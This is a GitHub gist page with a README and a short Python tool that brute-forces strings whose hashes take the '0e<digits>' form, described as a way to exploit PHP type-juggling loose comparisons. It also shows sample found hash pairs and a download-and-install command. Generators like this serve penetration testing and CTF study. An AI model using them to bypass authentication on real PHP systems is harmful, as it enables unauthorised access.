Skip to content

Instantly share code, notes, and snippets.

@dhondta

dhondta/README.md

Last active Apr 23, 2021
Embed
What would you like to do?
Tinyscript tool for generating loose comparison hashes for PHP type juggling

PHP loose comparison input generator

This can be installed using:

$ pip install tinyscript
$ wget https://gist.githubusercontent.com/dhondta/8937374f087f708c608bcacac431969f/raw/loose-comparison-input-generator.py && chmod +x loose-comparison-input-generator.py && sudo mv loose-comparison-input-generator.py /usr/bin/loose-comparison-input-generator

This tool is especially useful in the use cases hereafter.

Generate hashes for exploiting a PHP type juggling vulnerability

$ python3 loose-comparison-input-generator.py --timings -a 0123456789abcdefABCDEF
22:08:25 [WARNING] 0e283693623042943587666692738042: 1Cbca4D
22:08:25 [TIME] > Time elapsed since execution start: 976.6611046791077 seconds
22:22:14 [WARNING] 0e743365132016763607448823802679: 462beA7
22:22:14 [TIME] > Time elapsed since execution start: 1805.5506649017334 seconds
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__version__ = "1.1"
__copyright__ = "A. D'Hondt"
__license__ = "agpl-3.0"
__doc__ = """
This tool simply generates a string with a given alphabet that has a given hash
matching the format used for type juggling with PHP, that is when a loose
comparison of the type ("0e12345" == ...) is used.
"""
__examples__ = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]
if __name__ == '__main__':
parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
initialize(add_time=True)
validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
for s in ts.bruteforce(2**32, args.alphabet):
h = getattr(hashlib, args.hash)(b(s)).hexdigest()
logger.debug("{}: {}".format(h, s))
if re.match(r"^0+e\d+$", h):
logger.warn("{}: {}".format(h, s))
get_time()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment